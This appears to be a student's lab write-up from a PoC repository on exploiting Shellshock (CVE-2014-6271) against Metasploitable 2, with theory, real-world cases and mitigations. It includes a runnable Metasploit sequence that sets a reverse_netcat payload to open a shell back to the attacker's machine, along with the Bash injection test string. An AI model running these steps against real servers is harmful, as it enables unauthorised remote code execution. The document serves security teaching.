CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source

Associated Vulnerability

Readme

# 🐚 Shellshock (CVE-2014-6271) – Exploitation & Analysis

## 📌 Overview
This is the practical assignment for **Vulnerability Assessment and Penetration Testing – II**, focusing on the exploitation and analysis of the **Shellshock vulnerability** (**CVE-2014-6271**).  
Conducted in a **controlled lab environment** using **Metasploitable 2** (target) and **Kali Linux** (attacker).

---

## 🛠 Tools Used
- 💻 **Kali Linux** – Attacker machine
- 🖥 **Metasploitable 2** – Vulnerable target
- 🔍 **Nmap** – Scanning & service detection
- 🎯 **Metasploit Framework** – Exploitation

---

## 🔍 Vulnerability Summary
- **Type:** Remote Code Execution (RCE)  
- **Affected Component:** GNU Bash (versions 1.14–4.3)  
- **Impact:** Execute arbitrary commands via specially crafted environment variables  
- **CVSS Score:** 10.0 (**Critical**)  
- **Exploitation Vector:** Often through HTTP headers to CGI scripts  

---

## ⚡ Lab Steps

### 1️⃣ Scan Target
```bash
 nmap -sS -sV <target-ip>
```
2️⃣ Start Metasploit
 ```msfconsole```

3️⃣ Load Exploit Module
```use exploit/multi/http/apache_mod_cgi_bash_env_exec```

4️⃣ Configure Exploit
```
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
```

5️⃣ Run Exploit
```exploit```

📸 Demonstration Includes

    📡 Nmap scan results

    ⚙️ Metasploit configuration

    🔄 Reverse shell session output

    🛠 Post-exploitation commands:

    whoami
    uname -a
    ifconfig

📖 Theoretical Background
What is Shellshock?

Shellshock is a vulnerability in the GNU Bash shell that allows attackers to execute arbitrary commands by injecting them into environment variables.
Discovered in September 2014 and assigned CVE-2014-6271, it affects Bash v1.14 to v4.3.
How It Works

Bash incorrectly processes function definitions in environment variables and executes extra commands after the function body.
In web servers using CGI scripts, HTTP headers become environment variables, creating an easy attack path.

Example:

env x='() { :;}; echo vulnerable' bash -c "echo test"

If vulnerable, it prints vulnerable.
Impact

    Full Remote Code Execution (RCE) without authentication

    Exploitable via simple HTTP requests

    Used in botnets, worms, targeted attacks

    Affected millions of servers, routers, and IoT devices

Real-World Exploits

    Yahoo Servers – Malware via CGI scripts

    Wopbot Botnet – Automated exploitation

    QNAP NAS – Remote shell access & malware

    Self-Replicating Worms – Spread to new vulnerable hosts

🛡 Prevention & Mitigation

    🔄 Update Bash immediately

    🚫 Disable unused CGI scripts

    🔥 Use firewalls to block unnecessary traffic

    🛡 Deploy Web Application Firewalls (WAF)

    📜 Monitor HTTP request logs

    👤 Apply Least Privilege principles

⚠️ Disclaimer

This project is for educational purposes only.
All testing was in a controlled lab environment.
❌ Do NOT use these techniques on systems without permission.

👨‍💻 Author: Janith Madhusankha
🎓 Course: BICT (Hons) in Network & Security
🏫 Institution: South Eastern University of Sri Lanka

File Snapshot

 [4.0K]  /data/pocs/273eeae993584702cccd3891e36f4d582cbfd0e3
├── [3.2K]  README.md
└── [717K]  Shellshock (CVE-2014-6271) Exploitation and Analysis.pdf

0 directories, 2 files

Remarks